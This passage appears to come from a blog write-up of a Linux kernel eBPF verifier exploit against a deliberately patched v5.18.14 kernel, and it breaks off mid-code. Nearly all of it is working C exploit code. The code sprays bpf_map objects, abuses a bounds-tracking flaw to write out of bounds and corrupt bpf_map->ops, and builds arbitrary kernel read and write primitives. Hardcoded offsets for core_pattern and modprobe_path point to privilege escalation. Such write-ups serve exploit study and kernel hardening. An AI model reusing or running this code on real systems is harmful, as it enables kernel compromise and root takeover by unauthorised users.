      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
